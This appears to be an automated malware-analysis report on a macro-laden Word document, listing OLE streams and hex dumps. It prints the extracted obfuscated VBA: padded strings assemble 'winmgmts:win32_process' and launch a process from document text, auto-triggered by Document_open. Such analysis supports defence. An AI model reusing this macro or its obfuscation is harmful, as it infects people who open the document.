                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 14 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 1b 06 00 00 7b 1f 00 00 00 00 00 00 01 00 00 00 0c ff 3a 0a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      XFTxEQJDN
                      "w]xm[vw]xm[v"
                      gIKrmCJj
                      xSGbCJ
                      dxRvhumeH
                      Fix(dTSeMQG)
                      Fix(zHdGqDLim)
                      (Fix(DqmzWgJHy)
                      RXvmIZQm
                      AiEWeBgBl
                      MSsFhG
                      CXFGDHlI
                      "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                      shylMG
                      reejhCJo:
                      Fix(ZJLnFB)
                      Resume
                      XFTxEQJDN:
                      Fix(CcLHCeb)
                      TMBZGWW
                      (Fix(sJrfKHHt)
                      Fix(neULB)
                      xbIYArN
                      DheYzB
                      HRHrHJDlD
                      MwLbBJBFI
                      NhxAGvAH
                      YjbuICHY
                      Len(dsfe))),
                      ulfWCCiFF
                      WJzJI
                      kshfoytP:
                      Fix(RXvmIZQm)
                      cuCYC
                      Fix(ZYHZlIii)
                      JfXdCsEp
                      InptugrzA
                      Fix(gIKrmCJj)
                      Fix(kshfoytP)
                      JSrfhd:
                      Fix(JfXdCsEp)
                      MiKCE
                      Fix(PNjoAGP)
                      gpIBBDhi
                      JfXdCsEp:
                      Fix(nYjBpD)
                      Fix(sJrfKHHt)
                      UYbmGGDC
                      QKtUz
                      Fix(QKtUz)
                      SetWuCGdA
                      RXvmIZQm:
                      Fix(RXzua)
                      Fix(QWDldHHR)
                      Fix(BzbdEl)
                      TgbVU
                      tqIkDIrD
                      nYjBpD
                      Fix(shylMG)
                      dTSeMQG
                      DJlZDCM
                      "w]xm[v",
                      rvmetA
                      ykgfGkNf
                      Fix(XFTxEQJDN)
                      (Fix(cYdfo)
                      Fix(fRfgHB)
                      Fix(JSrfhd)
                      NfAUFNI
                      CcLHCeb
                      eEAOBGE
                      FBkjB
                      reejhCJo
                      mZXJjJAgq
                      aDUvJDOI:
                      cYdfo
                      zHdGqDLim
                      sJrfKHHt
                      iKSwBkUWG
                      PNjoAGP:
                      RXzua
                      aDUvJDOI
                      (Fix(dTSeMQG)
                      neULB:
                      lmdMEA
                      Fix(cYdfo)
                      vRYIMlBHH
                      UnYMEIiCD
                      Fix(DqmzWgJHy)
                      dNfeF
                      PNjoAGP
                      tYFukEBCC
                      xSGbCJ:
                      "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                      ElseIf
                      (Fix(fRfgHB)
                      UDFpCBJJ
                      (Fix(zHdGqDLim)
                      Fix(reejhCJo)
                      SgwfJAm
                      JSrfhd
                      OkSpwDa
                      QWDldHHR
                      ZYHZlIii:
                      Fix(xSGbCJ)
                      SrmTEEB
                      QWDldHHR:
                      vEHmFIM
                      (Fix(tYFukEBCC)
                      bONvDCElF
                      jzjFFpDhA
                      ggGVJ
                      fRfgHB
                      (Fix(PgRakD)
                      xTZpYXiBF
                      iTfwbHGDH
                      (Fix(CcLHCeb)
                      dUNUgHJG
                      Error
                      THkIAUF
                      kshfoytP
                      MybcQH
                      zCXyyY
                      Fix(AiEWeBgBl)
                      Attribute
                      Fix(aDUvJDOI)
                      GlHkEN
                      gpBWaEPFj
                      Fix(PgRakD)
                      fZVmJ
                      oaACDga
                      szALCGBF
                      (Fix(QKtUz)
                      Fix(tYFukEBCC)
                      VB_Name
                      ICwOHad
                      llWECD
                      (Fix(bONvDCElF)
                      PgRakD
                      gIKrmCJj:
                      (Fix(RXzua)
                      Fix(zKEHRtJGG)
                      Fix(DJlZDCM)
                      Function
                      hzXmmAn
                      Fix(bONvDCElF)
                      BzbdEl:
                      PohBnF
                      GdxqnN
                      DJlZDCM:
                      sTlFD
                      rUIOAx
                      shylMG:
                      VDhTuRJ
                      Double
                      neULB
                      GDDUGJd
                      BzbdEl
                      zKEHRtJGG
                      GqPOTjZ
                      BhhWnCHb
                      CuCzGCw
                      (Fix(nYjBpD)
                      aEWwP
                      nDpnHa
                      ZJLnFB
                      "w]xm[vpw]xm[v"
                      ZYHZlIii
                      (Fix(AiEWeBgBl)
                      Mid(Application.Name,
                      DqmzWgJHy
                      (Fix(zKEHRtJGG)
                      cMaNE
                      (Fix(ZJLnFB)
                      VBA Code
                      Attribute VB_Name = "Gx8fznt8p0b"
Function Bn2p1rxokklh_9o8()
On Error Resume Next
Ypgqgc4wnez0kz = Xaem5y61ivq
dsfe = Hj9iyfe3bvb + Kyl0l3rqw280c6ssa.StoryRanges(wdMainTextStory) + Xrsb1iydy1_t2h
   GoTo BzbdEl
Set CuCzGCw = ykgfGkNf
    Dim BhhWnCHb As Double
    BhhWnCHb = Fix(BzbdEl)
    If BhhWnCHb <> BzbdEl Then Exit Function
    Dim sJrfKHHt As Double
    sJrfKHHt = BhhWnCHb ^ (1 / 3)
    If Fix(sJrfKHHt) ^ 3 = BhhWnCHb Then
        iKSwBkUWG = True
    ElseIf (Fix(sJrfKHHt) + 1) ^ 3 = BhhWnCHb Then
        iKSwBkUWG = True
    End If
BzbdEl:
g42 = "w]xm[vpw]xm[v"
Nux0owfnim4 = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
   GoTo JfXdCsEp
Set xTZpYXiBF = mZXJjJAgq
    Dim DheYzB As Double
    DheYzB = Fix(JfXdCsEp)
    If DheYzB <> JfXdCsEp Then Exit Function
    Dim fRfgHB As Double
    fRfgHB = DheYzB ^ (1 / 3)
    If Fix(fRfgHB) ^ 3 = DheYzB Then
        cMaNE = True
    ElseIf (Fix(fRfgHB) + 1) ^ 3 = DheYzB Then
        cMaNE = True
    End If
JfXdCsEp:
Tkegc8hi7tjrwtr9oa = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
   GoTo DJlZDCM
Set TgbVU = MSsFhG
    Dim NfAUFNI As Double
    NfAUFNI = Fix(DJlZDCM)
    If NfAUFNI <> DJlZDCM Then Exit Function
    Dim tYFukEBCC As Double
    tYFukEBCC = NfAUFNI ^ (1 / 3)
    If Fix(tYFukEBCC) ^ 3 = NfAUFNI Then
        MwLbBJBFI = True
    ElseIf (Fix(tYFukEBCC) + 1) ^ 3 = NfAUFNI Then
        MwLbBJBFI = True
    End If
DJlZDCM:
Aquvchbfc1s = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
   GoTo QWDldHHR
Set UnYMEIiCD = VDhTuRJ
    Dim hzXmmAn As Double
    hzXmmAn = Fix(QWDldHHR)
    If hzXmmAn <> QWDldHHR Then Exit Function
    Dim AiEWeBgBl As Double
    AiEWeBgBl = hzXmmAn ^ (1 / 3)
    If Fix(AiEWeBgBl) ^ 3 = hzXmmAn Then
        jzjFFpDhA = True
    ElseIf (Fix(AiEWeBgBl) + 1) ^ 3 = hzXmmAn Then
        jzjFFpDhA = True
    End If
QWDldHHR:
Wut_mfci5kk4lb = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
   GoTo reejhCJo
Set TMBZGWW = FBkjB
    Dim eEAOBGE As Double
    eEAOBGE = Fix(reejhCJo)
    If eEAOBGE <> reejhCJo Then Exit Function
    Dim cYdfo As Double
    cYdfo = eEAOBGE ^ (1 / 3)
    If Fix(cYdfo) ^ 3 = eEAOBGE Then
        tqIkDIrD = True
    ElseIf (Fix(cYdfo) + 1) ^ 3 = eEAOBGE Then
        tqIkDIrD = True
    End If
reejhCJo:
Kj4qbrmlwd2552l4 = Aquvchbfc1s + Wut_mfci5kk4lb + Tkegc8hi7tjrwtr9oa + g42 + Nux0owfnim4
   GoTo PNjoAGP
Set OkSpwDa = ICwOHad
    Dim lmdMEA As Double
    lmdMEA = Fix(PNjoAGP)
    If lmdMEA <> PNjoAGP Then Exit Function
    Dim ZJLnFB As Double
    ZJLnFB = lmdMEA ^ (1 / 3)
    If Fix(ZJLnFB) ^ 3 = lmdMEA Then
        fZVmJ = True
    ElseIf (Fix(ZJLnFB) + 1) ^ 3 = lmdMEA Then
        fZVmJ = True
    End If
PNjoAGP:
Ls12h2gypqhb = Ipls8rqp952u2lk1(Kj4qbrmlwd2552l4)
   GoTo shylMG
Set cuCYC = GlHkEN
    Dim THkIAUF As Double
    THkIAUF = Fix(shylMG)
    If THkIAUF <> shylMG Then Exit Function
    Dim CcLHCeb As Double
    CcLHCeb = THkIAUF ^ (1 / 3)
    If Fix(CcLHCeb) ^ 3 = THkIAUF Then
        rvmetA = True
    ElseIf (Fix(CcLHCeb) + 1) ^ 3 = THkIAUF Then
        rvmetA = True
    End If
shylMG:
Set Sy6vvpgixx8z_5f = CreateObject(Ls12h2gypqhb)
   GoTo neULB
Set gpBWaEPFj = nDpnHa
    Dim aEWwP As Double
    aEWwP = Fix(neULB)
    If aEWwP <> neULB Then Exit Function
    Dim PgRakD As Double
    PgRakD = aEWwP ^ (1 / 3)
    If Fix(PgRakD) ^ 3 = aEWwP Then
        PohBnF = True
    ElseIf (Fix(PgRakD) + 1) ^ 3 = aEWwP Then
        PohBnF = True
    End If
neULB:
   GoTo aDUvJDOI
Set gpIBBDhi = SgwfJAm
    Dim ulfWCCiFF As Double
    ulfWCCiFF = Fix(aDUvJDOI)
    If ulfWCCiFF <> aDUvJDOI Then Exit Function
    Dim bONvDCElF As Double
    bONvDCElF = ulfWCCiFF ^ (1 / 3)
    If Fix(bONvDCElF) ^ 3 = ulfWCCiFF Then
        MybcQH = True
    ElseIf (Fix(bONvDCElF) + 1) ^ 3 = ulfWCCiFF Then
        MybcQH = True
    End If
aDUvJDOI:
   GoTo xSGbCJ
Set WJzJI = GqPOTjZ
    Dim UYbmGGDC As Double
    UYbmGGDC = Fix(xSGbCJ)
    If UYbmGGDC <> xSGbCJ Then Exit Function
    Dim nYjBpD As Double
    nYjBpD = UYbmGGDC ^ (1 / 3)
    If Fix(nYjBpD) ^ 3 = UYbmGGDC Then
        HRHrHJDlD = True
    ElseIf (Fix(nYjBpD) + 1) ^ 3 = UYbmGGDC Then
        HRHrHJDlD = True
    End If
xSGbCJ:
Sy6vvpgixx8z_5f.Create Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))), Vc1971csmq7a5g9, W7x42qfm4_lw
   GoTo kshfoytP
Set ggGVJ = dUNUgHJG
    Dim oaACDga As Double
    oaACDga = Fix(kshfoytP)
    If oaACDga <> kshfoytP Then Exit Function
    Dim RXzua As Double
    RXzua = oaACDga ^ (1 / 3)
    If Fix(RXzua) ^ 3 = oaACDga Then
        dxRvhumeH = True
    ElseIf (Fix(RXzua) + 1) ^ 3 = oaACDga Then
        dxRvhumeH = True
    End If
kshfoytP:
   GoTo ZYHZlIii
Set sTlFD = SetWuCGdA
    Dim CXFGDHlI As Double
    CXFGDHlI = Fix(ZYHZlIii)
    If CXFGDHlI <> ZYHZlIii Then Exit Function
    Dim QKtUz As Double
    QKtUz = CXFGDHlI ^ (1 / 3)
    If Fix(QKtUz) ^ 3 = CXFGDHlI Then
        dNfeF = True
    ElseIf (Fix(QKtUz) + 1) ^ 3 = CXFGDHlI Then
        dNfeF = True
    End If
ZYHZlIii:
End Function
Function Ipls8rqp952u2lk1(V8_prqa_b590f6uz6z)
On Error Resume Next
   GoTo JSrfhd
Set llWECD = zCXyyY
    Dim xbIYArN As Double
    xbIYArN = Fix(JSrfhd)
    If xbIYArN <> JSrfhd Then Exit Function
    Dim zHdGqDLim As Double
    zHdGqDLim = xbIYArN ^ (1 / 3)
    If Fix(zHdGqDLim) ^ 3 = xbIYArN Then
        iTfwbHGDH = True
    ElseIf (Fix(zHdGqDLim) + 1) ^ 3 = xbIYArN Then
        iTfwbHGDH = True
    End If
JSrfhd:
Hvdntqk_ku4y1u_ = V8_prqa_b590f6uz6z
   GoTo XFTxEQJDN
Set vRYIMlBHH = szALCGBF
    Dim vEHmFIM As Double
    vEHmFIM = Fix(XFTxEQJDN)
    If vEHmFIM <> XFTxEQJDN Then Exit Function
    Dim dTSeMQG As Double
    dTSeMQG = vEHmFIM ^ (1 / 3)
    If Fix(dTSeMQG) ^ 3 = vEHmFIM Then
        MiKCE = True
    ElseIf (Fix(dTSeMQG) + 1) ^ 3 = vEHmFIM Then
        MiKCE = True
    End If
XFTxEQJDN:
Xz0p6qe4s08b07kkt = Cws3jiyt47ovpsrhug(Hvdntqk_ku4y1u_)
   GoTo RXvmIZQm
Set GDDUGJd = YjbuICHY
    Dim GdxqnN As Double
    GdxqnN = Fix(RXvmIZQm)
    If GdxqnN <> RXvmIZQm Then Exit Function
    Dim DqmzWgJHy As Double
    DqmzWgJHy = GdxqnN ^ (1 / 3)
    If Fix(DqmzWgJHy) ^ 3 = GdxqnN Then
        NhxAGvAH = True
    ElseIf (Fix(DqmzWgJHy) + 1) ^ 3 = GdxqnN Then
        NhxAGvAH = True
    End If
RXvmIZQm:
Ipls8rqp952u2lk1 = Xz0p6qe4s08b07kkt
   GoTo gIKrmCJj
Set InptugrzA = rUIOAx
    Dim UDFpCBJJ As Double
    UDFpCBJJ = Fix(gIKrmCJj)
    If UDFpCBJJ <> gIKrmCJj Then Exit Function
    Dim zKEHRtJGG As Double
    zKEHRtJGG = UDFpCBJJ ^ (1 / 3)
    If Fix(zKEHRtJGG) ^ 3 = UDFpCBJJ Then
        SrmTEEB = True
    ElseIf (Fix(zKEHRtJGG) + 1) ^ 3 = UDFpCBJJ Then
        SrmTEEB = True
    End If
gIKrmCJj:
End Function
Function Cws3jiyt47ovpsrhug(Mhb7dz_hsybhf0ic7)
Cws3jiyt47ovpsrhug = Replace(Mhb7dz_hsybhf0ic7, "w]xm[v", H1kcw0gko9w6ta3y)
End Function
                      VBA File Name: Kyl0l3rqw280c6ssa, Stream Size: 1118
                      General
                      Stream Path:Macros/VBA/Kyl0l3rqw280c6ssa
                      VBA File Name:Kyl0l3rqw280c6ssa
                      Stream Size:1118
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 0c ff 33 b6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Document_open()
                      VB_Creatable
                      False
                      Private
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code
                      Attribute VB_Name = "Kyl0l3rqw280c6ssa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Bn2p1rxokklh_9o8
End Sub
                      VBA File Name: P0_myy5fnenf, Stream Size: 699
                      General
                      Stream Path:Macros/VBA/P0_myy5fnenf
                      VBA File Name:P0_myy5fnenf
                      Stream Size:699
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 0c ff f1 d1 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Attribute
                      VB_Name
                      VBA Code
                      Attribute VB_Name = "P0_myy5fnenf"

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                      General
                      Stream Path:\x1CompObj
                      File Type:data
                      Stream Size:146
                      Entropy:4.00187355764
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      File Type:data
                      Stream Size:4096
                      Entropy:0.280929556603
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . o @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                      General
                      Stream Path:\x5SummaryInformation
                      File Type:data
                      Stream Size:544
                      Entropy:4.17934415163
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                      Stream Path: 1Table, File Type: data, Stream Size: 6424
                      General
                      Stream Path:1Table
                      File Type:data
                      Stream Size:6424
                      Entropy:6.13683822603
                      Base64 Encoded:True
                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                      Stream Path: Data, File Type: data, Stream Size: 99188
                      General
                      Stream Path:Data
                      File Type:data
                      Stream Size:99188
                      Entropy:7.39015578121
                      Base64 Encoded:True
                      Data ASCII:t . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . 7 . . " . . . . . . e i U . . . . . . . . . . . D . . . . . _ . . F . . . . . . . . 7 . . " . . . . . . e i U . . . . . . .
                      Data Raw:74 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 502
                      General
                      Stream Path:Macros/PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:502
                      Entropy:5.4581902648
                      Base64 Encoded:True
                      Data ASCII:I D = " { 7 B C 8 9 A B C - 1 9 3 3 - 4 F 3 3 - A 1 B A - 8 1 7 6 5 C 7 3 8 7 1 6 } " . . D o c u m e n t = K y l 0 l 3 r q w 2 8 0 c 6 s s a / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P 0 _ m y y 5 f n e n f . . M o d u l e = G x 8 f z n t 8 p 0 b . . E x e N a m e 3 2 = " W h k r t 3 k 9 v w q q " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 0 A A 8 0 E A 8 0 E A 8 0 E A 8 0 E " . . D P B = " 3 D 3 F E F 7
                      Data Raw:49 44 3d 22 7b 37 42 43 38 39 41 42 43 2d 31 39 33 33 2d 34 46 33 33 2d 41 31 42 41 2d 38 31 37 36 35 43 37 33 38 37 31 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 30 5f 6d 79 79 35 66 6e 65 6e 66 0d 0a 4d 6f 64 75 6c 65 3d 47 78 38 66 7a 6e 74 38 70 30 62 0d 0a 45 78 65
                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
                      General
                      Stream Path:Macros/PROJECTwm
                      File Type:data
                      Stream Size:131
                      Entropy:3.74080626522
                      Base64 Encoded:False
                      Data ASCII:K y l 0 l 3 r q w 2 8 0 c 6 s s a . K . y . l . 0 . l . 3 . r . q . w . 2 . 8 . 0 . c . 6 . s . s . a . . . P 0 _ m y y 5 f n e n f . P . 0 . _ . m . y . y . 5 . f . n . e . n . f . . . G x 8 f z n t 8 p 0 b . G . x . 8 . f . z . n . t . 8 . p . 0 . b . . . . .
                      Data Raw:4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 00 4b 00 79 00 6c 00 30 00 6c 00 33 00 72 00 71 00 77 00 32 00 38 00 30 00 63 00 36 00 73 00 73 00 61 00 00 00 50 30 5f 6d 79 79 35 66 6e 65 6e 66 00 50 00 30 00 5f 00 6d 00 79 00 79 00 35 00 66 00 6e 00 65 00 6e 00 66 00 00 00 47 78 38 66 7a 6e 74 38 70 30 62 00 47 00 78 00 38 00 66 00 7a 00 6e 00 74 00 38 00 70 00 30 00 62 00 00
                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4495
                      General
                      Stream Path:Macros/VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:4495
                      Entropy:5.32797660773
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 661
                      General
                      Stream Path:Macros/VBA/dir
                      File Type:data
                      Stream Size:661
                      Entropy:6.37896546622
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
